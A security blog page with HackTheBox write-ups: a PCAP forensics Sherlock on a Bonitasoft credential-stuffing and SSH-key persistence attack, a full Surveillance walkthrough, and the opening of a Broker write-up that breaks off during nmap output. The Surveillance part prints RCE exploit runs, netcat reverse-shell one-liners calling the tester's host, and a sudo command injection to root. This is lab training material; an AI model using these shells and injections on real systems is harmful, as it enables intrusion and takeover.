Ducksec

About Me

Hi! My name is Ducksec.

I'm a Pentester, Ethical Hacker, Security Consultant and animal lover with a passion for securing systems, networks and personal privacy. This blog is a place to post CTF writeups, tips and other articles which I hope will help others, as many others have helped me.


15 years' experience in IT across a variety of verticals including Aviation and Healthcare - everything from Tier 1 Helpdesk to Sysadmin, Web Developer and now Security Testing and Consulting. About 70 industry certifications at this point, and always learning more.


Cat person. I continue to believe the Crows will win an AFL Grand Final (maybe not this year...)

HTB and other CTFs

Latest Writeups (all)

  • Writeups

    Sherlocks are a new offering from HackTheBox - they’ve been available since the tail end of 2023, but I’ve been busy and have only just had time to dive into them. Rather than focusing on offensive security techniques, Sherlocks provide a great opportunity to sharpen your blue teaming skills - and so far, I think they’re great fun! Here, there are no flags to capture - instead, you need to obtain information to solve a series of tasks, quite similar to the approach used on HTB Academy. Meerkat is rated as “easy” by HackTheBox - it’s a great place to start with Sherlocks, so let’s dive in!

    Scenario

    Sherlocks come with a bit of scenario information which can help you along the way with the tasks - I wish HTB Machines also did this! For Meerkat, we get:

    As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren’t the most security aware. As our new security provider we’d like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.

    There’s also a zip file to download, which contains a .pcap file with network traffic from the time of the suspected compromise, as well as a .json file which seems to list some security events logged at the same time.

    We’ll open up the pcap file in Wireshark - the json file is also worth a look through, but I was able to complete all the tasks using just the pcap. Let’s now work through the tasks.

    Tasks

    1 - We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

    First of all, we’ll want to get our bearings and figure out which system is hosting the business management platform - a good way to start analysing a pcap is to get a feel for which systems are sending the most traffic. Often (but not always) these will be of the most interest. We can easily find this out by choosing

    Statistics -> IPv4 Statistics -> All Addresses from the menu:

    172.31.6.44 is clearly the busiest host in this capture, and we also have significant traffic from 156.146.62.213, 34.207.150.13, 54.144.148.213, 95.181.232.30, and 138.199.59.221.

    As a starting point, let’s filter for packets destined to 172.31.6.44 - in the Wireshark filter bar, we can type ip.dst == 172.31.6.44 to do this easily.

    Browsing through the traffic, we can quickly see there’s some HTTP traffic heading to an endpoint called /bonita/loginservice.

    Bonita sounds like it could be the business management service, and a quick google confirms this is the case.

    Answer Number 1: Bonitasoft.

    We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

    In order to answer this one, let’s explore the traffic a bit further - we can filter our results down even more at this point too. Right now we’re only interested in POST requests (i.e. login requests) to the business management system, so let’s add && http.request.method == POST to our filter. Being able to quickly filter traffic to find the information we’re interested in is one of Wireshark's best features, so it's worth experimenting a little if this is new to you!

    Now, only relevant traffic is in view - these are all login attempts directed to the relevant server. Clicking on a packet allows us to see its content (in the bottom pane), and working through these attempts reveals different usernames and passwords being submitted. More importantly for this task, we notice that whole sets of credentials are being used (rather than multiple usernames with a single password at a time, or vice versa) - so the correct term is “credential stuffing”. We can also confirm that 156.146.62.213 is probably the primary attacker machine, since this is where each of these login attempts originates.
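    The stuffing/spraying distinction is easy to mix up, so here’s a toy illustration (made-up credentials, not data from this capture) - the tell is how many distinct passwords appear across the attempted users:

```shell
# Credential stuffing replays leaked user:pass *pairs*, so the password
# differs per user; password spraying reuses one password across many users.
printf 'alice:Winter23!\nbob:hunter2\ncarol:letmein\n' \
  | cut -d: -f2 | sort -u | wc -l   # count of distinct passwords; >1 fits stuffing
```

    If that count were 1, spraying would be the better description.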

    Answer Number 2: Credential Stuffing

    Does the vulnerability exploited have a CVE assigned - and if so, which one?

    There were two ways to approach this task - I simply kept scrolling through the requests here, until I saw an interesting one which jumped out at me:

    As you can see, packets 2918 and 2925 don’t seem to be part of the same credential stuffing attack - rather, we’ve got an unusual string in a request to an API endpoint. At this point, I googled “i18ntranslation bonitasoft” (note, if you’re wondering: that ? is the query string delimiter, not part of the string itself) and hit on this page from Rhino Security Labs:

    An alternative approach here would have been to check the json file with the security alerts - it does indeed have some warnings for CVE-2022-25237.

    Answer Number 3: CVE-2022-25237

    Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?

    Too easy - we already have that one!

    Answer Number 4: i18ntranslation

    How many combinations of usernames and passwords were used in the credential stuffing attack?

    For this one, we’ll want to filter down to find all of the requests to the login endpoint - we can do this with:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice"

    We can see from the bottom of the Wireshark window that this gives us 118 packets - however, that’s not the right answer - some of these packets are duplicates using some installer credentials:

    So, let’s update our filter to get rid of those:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice" && !(http contains "install")

    I’m not sure if HTB are including this install/install combination as part of their credential stuffing count - I’ll assume not, but keep in mind that I might need to add one to my answer later. This filter now gives 59 packets, but this isn’t the right answer either - looking through, there are still a duplicate or two in there.

    To make things speedy, I’ll output the packets to a file, then use a bit of bash-fu to solve this one:

    Since the .pcap I’ve exported from Wireshark is a binary rather than a text format, I’ll need to use the strings command to get the content, then pass this to grep to get lines matching “username” (which is present in all the login attempts). Then I’ll use cut to separate the data at the = mark and print out the second field (i.e. the part after the =) - visually, this gives something like this:

    $ strings creds.pcapng | grep username | cut -d = -f 2 | uniq  
    Clerc.Killich%40forela.co.uk&password 
    Lauren.Pirozzi%40forela.co.uk&password 
    <SNIP>
    Mathian.Skidmore%40forela.co.uk&password 
    Gerri.Cordy%40forela.co.uk&password 
    seb.broom%40forela.co.uk&password 
    

    Finally, I’ll pass this to wc (with the -l argument to get the number of lines)

    $ strings creds.pcapng | grep username | cut -d = -f 2 | uniq | wc -l

    This gives me 56, which is the right answer. If you wanted an easier way of doing this, you could also just count the different logins by working through each packet - something like this works better at scale, however.
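    One caveat worth knowing about that pipeline: uniq only collapses *adjacent* duplicates, so it works here because repeated attempts sat next to each other in the capture. When ordering isn't guaranteed, sort -u is the safer habit - a quick demo on toy data:

```shell
# uniq collapses only adjacent repeats; sort -u dedupes regardless of order.
printf 'alice\nbob\nalice\n' | uniq    | wc -l   # 3 - the two alices aren't adjacent
printf 'alice\nbob\nalice\n' | sort -u | wc -l   # 2 - true distinct count
```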

    Answer Number 5: 56

    Which username and password combination was successful?

    To solve this one, it’s possible to simply work through the packets using a filter like this:

    ip.src_host == 172.31.6.44 && ip.dst_host == 156.146.62.213 && http

    This shows all the HTTP response packets from the business server to the attacker - we can work through these, looking for a 2XX code which will indicate success:

    We can find the valid login by working through the communications here - or, using our knowledge of HTTP response codes, we can make things really fast by searching for a 204 (login success!) response.

    This approach quickly finds the relevant packet, and the credentials which were used. In addition, we can see here that more than one IP was able to successfully authenticate - 138.199.59.221 also logged in. Let’s note that.

    If we explore the JSON format packets which follow this response, we can also see evidence of the attacker utilising the POC script provided in the Rhino Security Labs article, which further confirms the attack which took place.

    Answer Number 6: seb.broom@forela.co.uk:g0vernm3nt

    If any, which text sharing site did the attacker utilise?

    Let’s now “zoom out” a little and get a broader view of what’s happening as part of this attack - we know that the attacker used a POC for the relevant CVE to gain access to the server, and it looks like they also used more than one host as part of the attack. From here, we’ll therefore filter with ip.host == 172.31.6.44 && http to get all of the HTTP traffic to the business server again. Scrolling through, we can see the attacker exploiting the vulnerability to run cat /etc/passwd, and then again using wget to grab a file with wget https://pastes.io/raw/bx5gcr0et8. That’s our answer for this one!

    Here we're finding the file we need in the packet view:

    Answer Number 7: Pastes.io

    Please provide the filename of the public key used by the attacker to gain persistence on our host.

    Let’s go and check out the file which is being downloaded here:

    So, this file contains a curl command which will download another text file (also from pastes.io) before appending it to the authorized_keys file. The content of pastes.io/hffgra4unv will be the attacker's public key - and adding it to the system's authorized_keys file will provide them with a persistent way to log in using SSH.
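    As a hedged sketch of the mechanism (the key material and file here are stand-ins - the real paste contents and paths may differ), the persistence boils down to a single append, demonstrated against a scratch file rather than a real ~/.ssh:

```shell
# $keys stands in for /home/ubuntu/.ssh/authorized_keys, and the printf
# stands in for the 'curl https://pastes.io/raw/hffgra4unv' download.
keys=$(mktemp)
printf 'ssh-ed25519 AAAA...fake-attacker-key\n' >> "$keys"  # append, don't overwrite
grep -c 'fake-attacker-key' "$keys"    # prints 1 - the key is now trusted for SSH logins
rm -f "$keys"
```

    Appending (rather than overwriting) keeps legitimate keys working, which makes this persistence harder to notice.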

    Answer Number 8: hffgra4unv

    Can you confirm the file modified by the attacker to gain persistence?

    Another easy one, we already have this information!

    Answer Number 9: /home/ubuntu/.ssh/authorized_keys

    Can you confirm the MITRE technique ID of this type of persistence mechanism?

    Finally, a quick visit to the MITRE ATT&CK website and a search for SSH Authorized keys will allow us to find the technique ID : https://attack.mitre.org/techniques/T1098/004/

    Answer Number 10: T1098.004

    Final thoughts

    I really enjoyed Meerkat, and I love the idea of Sherlocks! Recently, I’ve felt that HTB machines have been becoming more and more nuanced and often a bit obscure - this makes sense; it’s a gamified platform and they want to keep players interested - but I much prefer challenges which feel relevant to real-world security. Sherlocks (so far, at least) feel much more relevant and are a great way to sharpen your blue teaming skills.

    See you in the next one!

  • Writeups

    Surveillance is a Medium difficulty box from HackTheBox, which includes plenty of enumeration, remote code execution, password reuse, command injection and some port forwarding. This was a fun box so let’s jump in!

    Gaining user access

    As usual, let’s begin with some basic enumeration - we’ll add surveillance.htb to /etc/hosts, and run nmap:

    Nmap scan report for surveillance.htb (10.129.230.42)
    Host is up, received user-set (0.022s latency).
    Scanned at 2024-12-21 11:00:14 GMT for 24s
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
    |   256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
    80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
    |_http-favicon: Unknown favicon MD5: 0B7345BDDB34DAEE691A08BF633AE076
    |_http-title:  Surveillance 
    | http-methods: 
    |_  Supported Methods: GET HEAD POST
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    

    As is often the case with HackTheBox, we have a webserver and not much else to play with.

    Let’s enumerate the server then! I’ll fire up feroxbuster in the background, run whatweb to get a quick overview of the technologies which power the site, then take a look at the site itself.

    WhatWeb report for http://surveillance.htb:80 
    Status   : 200 OK 
    Title   : Surveillance 
    IP     : 10.129.230.42 
    Country  : RESERVED, ZZ 
    
    Summary  : Bootstrap[4.3.1], Email[demo@surveillance.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], JQuery[3.4.1], nginx[1.18.0], Script[text/javascript], X-Powered-By[Craft CMS], X-UA-Compatible[IE=edge]
    

    WhatWeb suggests that the page is built on Craft CMS - this will be important in a moment, but first let’s keep enumerating.

    The site itself looks like a fairly standard small-business type page - the most interesting element being another reference to Craft CMS:

    Meanwhile, feroxbuster has identified a few useful leads, including an admin page, although a few tries with “admin/admin”, “admin/password” and the usual easy wins get us nowhere.

    <SNIP>
    200        0l        0w        0c http://surveillance.htb/.gitkeep
    200        9l       26w      304c http://surveillance.htb/.htaccess
    302        0l        0w        0c http://surveillance.htb/admin
    301        7l       12w      178c http://surveillance.htb/css
    301        7l       12w      178c http://surveillance.htb/fonts
    301        7l       12w      178c http://surveillance.htb/images
    301        7l       12w      178c http://surveillance.htb/img
    200        1l        0w        0c http://surveillance.htb/index
    <SNIP>
    

    Looking further at the page, we notice that the “Powered by Craft CMS” notice is actually a link, and that link reveals the specific version of the software - 4.4.14

    Let’s therefore google around and see if there are any known vulnerabilities for this version - indeed, there is one!

    Craft CMS suffers from a Remote Code Execution (RCE) vulnerability, identified as CVE-2023-41892. The vulnerability resides in the \craft\controllers\ConditionsController class, particularly in its beforeAction method. This method allows the insecure creation of arbitrary objects, which in turn can lead to arbitrary file inclusion. The POC developed here by calif: https://blog.calif.io/p/craftcms-rce uses the \yii\rbac\PhpManager::loadFromFile method, which can include PHP code from an arbitrary file into Craft CMS’s log file. As always, calif's original post is worth a read!

    With a bit of searching, I find a pre-packaged python exploit, so let’s give this one a go:

    https://gist.githubusercontent.com/to016/b796ca3275fa11b5ab9594b1522f7226/raw/4742df53be0584c68d6f7550224948fc6709fea9/CVE-2024-41892-POC.md

    └──╼ $ python3 poc2.py http://surveillance.htb 10.10.14.26 4848 
    [!] Please execute `nc -lvnp <port>` before running this script ... 
    [-] Get temporary folder and document root ... 
    [-] Write payload to temporary file ... 
    [-] Trigger imagick to write shell ... 
    [+] reverse shell is executing ...
    

    Excellent, the exploit works, and the shell comes back - we have access as www-data.

    
    └──╼ $ nc -nvlp 4848 
    listening on [any] 4848 ... 
    connect to [10.10.14.26] from (UNKNOWN) [10.129.16.185] 35996 
    /bin/sh: 0: can't access tty; job control turned off 
    $ whoami 
    www-data 
    $ python3 -c "import pty; pty.spawn('/bin/bash')" 
    www-data@surveillance:~/html/craft/web/cpresources$ 
    

    Once I have the shell, I can use python to spawn a new pty, giving us a more reasonable terminal. From here, the first priority is to enumerate the web application itself. Having not used Craft CMS myself, I’m not 100% sure what to look for, but as a general rule I’m especially interested in configuration files (especially database configuration files), backups, leftover documentation or test code, and other sensitive files. Before long, I stumble upon this interesting-looking directory:

    www-data@surveillance:~/html/craft/storage/backups$ ls -lah
    ls -lah
    total 28K
    drwxrwxr-x 2 www-data www-data 4.0K Oct 17  2024 .
    drwxr-xr-x 6 www-data www-data 4.0K Oct 11  2024 ..
    -rw-r--r-- 1 root     root      20K Oct 17  2024 surveillance--2024-10-17-202801--v4.4.14.sql.zip
    www-data@surveillance:~/html/craft/storage/backups$ 
    

    Which contains an SQL backup. Let’s stand up a python server and grab the file on our attack box.

    www-data@surveillance:~/html/craft/storage/backups$ python3 -m http.server 8181 
    </craft/storage/backups$ python3 -m http.server 8181 
    Serving HTTP on 0.0.0.0 port 8181 (http://0.0.0.0:8181/) ... 
    10.10.14.61 - - [21/Dec/2024 13:22:40] "GET /surveillance--2024-10-17-202801--v4.4.14.sql.zip HTTP/1.1" 200 -
    

    Unzipping the file gives us an SQL dump which contains exactly the sort of information we're interested in:

    INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2024-10-17 20:22:34',NULL,NULL,NULL,'2024-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2024-10-17 20:27:46','2024-10-11 17:57:16','2024-10-17 20:27:46');
    

    39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec looks like a hash - probably SHA-256. Let’s check the number of characters to confirm this - for SHA-256, it should be 64. (Remember wondering why you had to learn this in Pentest+? :) )

    └──╼ $ echo 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec | wc -c  
    65
    

    65? That’s not right - can you spot my error? By default, echo adds a newline character - we need to use -n to suppress it:

    └──╼ $ echo -n 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec | wc -c  
    64
    

    Much better. So, that’s a SHA-256 hash of the admin password for Craft CMS - let’s see if we can crack it with hashcat:

    └──╼ $hashcat -m 1400 hash /usr/share/wordlists/rockyou.txt  
    hashcat (v6.1.1) starting... 
    
    <SNIP>
    
    Dictionary cache hit: 
    
    * Filename..: /usr/share/wordlists/rockyou.txt 
    * Passwords.: 14344385 
    * Bytes.....: 139921507 
    * Keyspace..: 14344385 
    
    39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490 
    
    

    Excellent - we now have the admin password. From here, there are two promising ways to proceed:

    1. Log into Craft CMS and enumerate further.
    2. See if Matthew is also a user on the box, and bank on him having reused his password.

    I’m sure you know where I’m going to start :)

    www-data@surveillance:~/html/craft/storage/backups$ cat /etc/passwd | grep matthew
    matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
    

    And the password…

    └──╼ $ ssh matthew@surveillance.htb 
    matthew@surveillance.htb's password:  
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64) 
    
     * Documentation:  https://help.ubuntu.com 
     * Management:   https://landscape.canonical.com 
     * Support:     https://ubuntu.com/advantage 
    
      System information as of Sun Apr 21 09:03:06 AM UTC 2024 
    
      System load:  0.0009765625    Processes:       225 
      Usage of /:  69.4% of 5.91GB  Users logged in:    0 
      Memory usage: 12%        IPv4 address for eth0: 10.129.16.185 
      Swap usage:  0% 
    
    
    Expanded Security Maintenance for Applications is not enabled. 
    
    0 updates can be applied immediately. 
    
    Enable ESM Apps to receive additional future security updates. 
    See https://ubuntu.com/esm or run: sudo pro status 
    
    
    The list of available updates is more than a week old. 
    To check for new updates run: sudo apt update 
    
    matthew@surveillance:~$ whoami 
    matthew 
    matthew@surveillance:~$ 
    

    …is reused. We now have user access as Matthew.

    Gaining root access

    Let’s begin with some basic enumeration:

    matthew@surveillance:~$ sudo -l  
    [sudo] password for matthew:  
    Sorry, user matthew may not run sudo on surveillance. 
    matthew@surveillance:~$ netstat -tulpn 
    Active Internet connections (only servers) 
    Proto Recv-Q Send-Q Local Address      Foreign Address     State    PID/Program name   
    tcp     0    0 0.0.0.0:80        0.0.0.0:*        LISTEN    -           
    tcp     0    0 0.0.0.0:22        0.0.0.0:*        LISTEN    -           
    tcp     0    0 127.0.0.1:8080      0.0.0.0:*        LISTEN    -           
    tcp     0    0 127.0.0.1:3306      0.0.0.0:*        LISTEN    -           
    tcp     0    0 127.0.0.53:53      0.0.0.0:*        LISTEN    -           
    tcp6    0    0 :::22          :::*           LISTEN    -           
    udp     0    0 127.0.0.53:53      0.0.0.0:*              -           
    udp     0    0 0.0.0.0:68        0.0.0.0:*              -          
    

    So, we can't sudo, but we do have some applications listening internally - 3306 will be the database and 53 is DNS, but 8080 is almost certainly another web app. We can use curl to check:

    matthew@surveillance:~$ curl http://localhost:8080
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <title>ZM - Login</title>
    
    <SNIP>
    
            <div class="container">
                    <form class="center-block" name="loginForm" id="loginForm" method="post" action="?view=login"><input type='hidden' name='__csrf_magic' value="key:754dfd4f13ec07577f44aecddfa2fb8dce559637,1713690537" />
                            <input type="hidden" name="action" value="login"/>
          <input type="hidden" name="postLoginQuery" value="" />
    
                            <div id="loginError" class="hidden alarm" role="alert">
                                    <span class="glyphicon glyphicon-exclamation-sign" aria-hidden="true"></span>
                                    Invalid username or password.
                            </div>
        
                            <div id="loginform">
        
            <h1><i class="material-icons md-36">account_circle</i> ZoneMinder Login</h1>
        
                                    <label for="inputUsername" class="sr-only">Username</label>
                                    <input type="text" id="inputUsername" name="username" class="form-control" autocapitalize="none" placeholder="Username" required autofocus autocomplete="username"/>
        
                                    <label for="inputPassword" class="sr-only">Password</label>
                                    <input type="password" id="inputPassword" name="password" class="form-control" placeholder="Password" required autocomplete="current-password"/>
                                    <button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>
                            </div>
                    </form>
            </div>
            
    <SNIP>        
    

    We definitely have a web app, with a login form - so let’s use ssh to port forward back to our attack box and explore this in more depth.

    └──╼ ssh -v -L 8080:127.0.0.1:8080 matthew@surveillance.htb
    

    When doing port forwarding, I like to use the -v flag for verbose mode - ssh port forwarding usually works well, but it can be hard to figure out what's going wrong (the remote application, or your ssh session) when things don't quite click. With this connection established, any traffic I send to my localhost (127.0.0.1) on port 8080 will be directed to port 8080 on the target system, so we can now interact with the application as if we're on that machine.

    We’ll try logging in with the credentials we have - “admin/starcraft122490” - and we gain access.

    From the dashboard, we can quickly enumerate the version of the software - v1.36.32 - so let's again see if there are any published vulnerabilities or exploits.

    We quickly find a relevant vulnerability - CVE-2023-26035 states that ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action. That's just what we're looking for - and on GitHub there's another excellent POC script: https://github.com/rvizx/CVE-2024-26035

    We’ll clone the repo and give it a go - remember that since we’re port forwarding, the target IP and port will now be our own localhost and the local port we’re using.

    └──╼ $ python3 exploit.py -t http://127.0.0.1:8080/ -ip 10.10.14.26 -p 4141 
    [>] fetching csrt token 
    [>] recieved the token: key:635f1e26db3cdee58908aa6437824c2194ed6cd1,1713692075 
    [>] executing... 
    [>] sending payload.. 
    

    Excellent, we now have a shell as the zoneminder user:

    └──╼ $nc -nvlp 4141
    listening on [any] 4141 ...
    connect to [10.10.14.26] from (UNKNOWN) [10.129.16.185] 33738
    bash: cannot set terminal process group (1010): Inappropriate ioctl for device
    bash: no job control in this shell
    zoneminder@surveillance:/usr/share/zoneminder/www$  
    

    Once again, let’s enumerate!

    zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l 
    sudo -l 
    Matching Defaults entries for zoneminder on surveillance:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
        use_pty
    
    User zoneminder may run the following commands on surveillance:
        (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
    

    We have more luck with sudo -l this time - the zoneminder user can execute, as root and without a password, any command that starts with /usr/bin/zm, followed by zero or more alphabetical characters, ending in .pl, and potentially followed by additional arguments (the trailing *). This essentially grants the user the ability to run the various ZoneMinder Perl scripts with root privileges. There are plenty of these, but which one can we abuse?
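    Shell glob matching follows roughly the same rules as this sudoers wildcard, so we can sanity-check which filenames fall in scope (illustrative only - sudoers uses fnmatch-style patterns, and the trailing " *" for arguments is omitted here):

```shell
# Which of these paths would the sudoers pattern /usr/bin/zm[a-zA-Z]*.pl match?
for f in /usr/bin/zmupdate.pl /usr/bin/zmcleanup.sh; do
  case "$f" in
    /usr/bin/zm[a-zA-Z]*.pl) echo "$f: allowed via sudo" ;;
    *)                       echo "$f: not matched" ;;
  esac
done
```

    On the box itself, ls -l /usr/bin/zm*.pl enumerates the real candidates.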

    <SNIP>
    -rwxr-xr-x 1 root root 45421 Nov 23 2022 /usr/bin/zmupdate.pl
    -rwxr-xr-x 1 root root 8205 Nov 23 2022 /usr/bin/zmvideo.pl
    -rwxr-xr-x 1 root root 7022 Nov 23 2022 /usr/bin/zmwatch.pl
    -rwxr-xr-x 1 root root 19655 Nov 23 2022 /usr/bin/zmx10.pl
    
    

    Admittedly, I got stuck here for quite a while - since we're able to control arguments to the scripts, we need an argument which isn't properly escaped and which is then passed to exec or system. I grepped through all the files but couldn't find any candidates. What I didn't know (not being a Perl guy) is that qx is also a valid way to execute commands in Perl (thanks, HackTheBox forum!).

    Now, looking for invocations of qx, we find one in zmupdate.pl - qx executes the variable $command:

       my $output = qx($command);
    

    which in turn is just an assembled mysqldump command - critically, the variable $dbUser is unescaped, AND we can control it with the --user argument:

    my $command = 'mysqldump';
          if ($super) {
            $command .= ' --defaults-file=/etc/mysql/debian.cnf';
          } elsif ($dbUser) {
            $command .= ' -u'.$dbUser;
            $command .= ' -p\''.$dbPass.'\'' if $dbPass;
          }
    

    So, the script is expecting an argument like --user jim - but what if we pass a command instead? To do this, we can use a feature of the shell called command substitution - in short, anything enclosed within $(...) is treated as a command to be executed by the shell, and the output of that command then replaces the substitution. Therefore, if I pass the script $(/bin/bash -i) as an argument rather than a username, this should end up as part of $command, which will then be executed by qx as root. Well, that's the theory anyway - let's try it!
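    A standalone illustration of that substitution behaviour first - nothing box-specific, and the variable names are just for the demo:

```shell
# When a string containing $(...) is later evaluated by a shell (which is
# effectively what Perl's qx() does), the inner command runs first and its
# output is spliced into the command line.
injected='-u$(echo pwned)'          # attacker-controlled "username"
sh -c "echo mysqldump $injected"    # prints: mysqldump -upwned
```

    With the mechanism confirmed in miniature, on to the real target.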

    zoneminder@surveillance:/usr/share/zoneminder/www$ sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2024 
    <ser='$(/bin/bash -i)' --pass=ZoneMinderPassword2024 
    
    Initiating database upgrade to version 1.36.32 from version 1 
    
    WARNING - You have specified an upgrade from version 1 but the database version found is 1.36.32. Is this correct? 
    Press enter to continue or ctrl-C to abort :  
    
    Do you wish to take a backup of your database prior to upgrading? 
    This may result in a large file in /tmp/zm if you have a lot of events. 
    Press 'y' for a backup or 'n' to continue : n 
    
    Upgrading database to version 1.36.32 
    Upgrading DB to 1.26.1 from 1.26.0 
    bash: cannot set terminal process group (1010): Inappropriate ioctl for device 
    bash: no job control in this shell 
    root@surveillance:/usr/share/zoneminder/www# whoami 
    whoami 
    root@surveillance:/usr/share/zoneminder/www# ls 
    ls 
    
    

    This worked, in that it did provide a root shell, but I'm not able to actually see any command output - there's a simple solution: let's just spawn yet another shell:

    root@surveillance:/usr/share/zoneminder/www# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 7777 >/tmp/f 
    < /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 7777 >/tmp/f 
    rm: cannot remove '/tmp/f': No such file or directory
    

    And this comes back, we’re root!

    └──╼ $ nc -nvlp 7777 
    listening on [any] 7777 ... 
    connect to [10.10.14.26] from (UNKNOWN) [10.129.16.185] 53892 
    /bin/sh: 0: can't access tty; job control turned off 
    # whoami 
    root 
    #   
    

    Avoiding the Hack - Lessons learned

    For me, the most important takeaway from this box was just how dangerous password reuse is. Notice how, despite being able to exploit an out-of-date version of Craft CMS, it would have been impossible to get even as far as user-level access without it?

    Password reuse is such a problem because it significantly negates the value of even a very strong password. starcraft122490, while not exactly super strong, isn't especially bad - 15 alphanumeric characters would meet many organisational password policies. For reference, Bitwarden's password strength tester calls it “good”.

    Of course, this one exists within rockyou.txt (which is another reason your organisation needs a banned-passwords list), so it would be daft to use it - everyone who's installed Parrot OS or Kali Linux has a copy - but the fact is a password needs to be breached only once before it's possible for an attacker to have access to it. Most breached passwords do eventually end up in lists just like rockyou.txt - and you might never know yours is included. While services which monitor for password breaches are an incredibly valuable tool in this fight, they're not 100% reliable. Indeed, despite being in rockyou.txt, this one gets a clean bill of health over at haveibeenpwned.com.

    For this reason, it’s essential that passwords are never re-used - this way, if and when they are breached the access granted to an attacker is at least limited. To provide more reliable protection (and while it can be difficult to implement) password rotation for both users and applications is a must. If you’re building an application from scratch today - especially if you’re optimising for the cloud - consider storing, and rotating passwords or keys in some form of secrets manager (eg. AWS Secrets Manager) to make automating this process much easier.

    That’s all for this one, see you next time!

  • Writeups

    Broker is an easy difficulty Linux machine hosting a vulnerable version of Apache ActiveMQ. Enumerating the version of Apache ActiveMQ shows that it is vulnerable to Unauthenticated Remote Code Execution, which is leveraged to gain user access on the target. Post-exploitation enumeration reveals that the system has a sudo misconfiguration allowing the activemq user to execute sudo /usr/sbin/nginx which can be exploited in a number of ways to gain root privilege. Let’s dive in!

    Gaining user access

    As usual, we’ll add broker.htb to /etc/hosts, fire off nmap and see what we’ve got!

    Right away, nmap gives quite a lot of output:

    nmap broker.htb -sC -sV -p- 
    
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-10 13:28 GMT 
    Nmap scan report for broker.htb (10.129.65.73) 
    Host is up (0.023s latency). 
    Not shown: 65526 closed tcp ports (conn-refused) 
    PORT    STATE SERVICE   VERSION 
    22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 
    | ssh-hostkey:  
    |  256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA) 
    |_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519) 
    80/tcp   open  http    nginx 1.18.0 (Ubuntu) 
    | http-auth:  
    | HTTP/1.1 401 Unauthorized\x0D 
    |_  basic realm=ActiveMQRealm 
    |_http-title: Error 401 Unauthorized 
    |_http-server-header: nginx/1.18.0 (Ubuntu) 
    1883/tcp  open  mqtt 
    | mqtt-subscribe:  
    |  Topics and their most recent payloads:  
    |   ActiveMQ/Advisory/Consumer/Topic/#:  
    |_   ActiveMQ/Advisory/MasterBroker:  
    5672/tcp  open  amqp? 
    | fingerprint-strings:  
    |  DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:  
    |   AMQP 
    |   AMQP 
    |   amqp:decode-error 
    |_   7Connection from client using unsupported AMQP attempted 
    |_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65 
    8161/tcp  open  http    Jetty 9.4.39.v20210325 
    |_http-title: Error 401 Unauthorized 
    | http-auth:  
    | HTTP/1.1 401 Unauthorized\x0D 
    |_  basic realm=ActiveMQRealm 
    |_http-server-header: Jetty(9.4.39.v20210325) 
    45975/tcp open  tcpwrapped 
    61613/tcp open  stomp    Apache ActiveMQ 
    | fingerprint-strings:  
    |  HELP4STOMP:  
    |   ERROR 
    |   content-type:text/plain 
    |   message:Unknown STOMP action: HELP 
    |   org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP 
